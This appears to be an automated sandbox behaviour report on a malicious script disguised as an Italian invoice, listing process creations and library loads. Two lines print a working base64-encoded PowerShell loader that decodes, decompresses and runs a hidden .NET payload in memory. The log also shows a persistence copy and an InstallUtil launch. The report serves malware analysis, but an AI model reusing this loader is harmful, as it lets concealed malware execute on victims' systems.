Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
